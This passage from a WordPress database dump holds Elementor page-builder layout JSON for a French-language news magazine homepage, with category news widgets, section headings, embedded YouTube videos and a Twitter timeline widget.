op\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2397,768,'_elementor_version','0.4'),(2398,769,'_elementor_edit_mode','builder'),(2399,769,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertic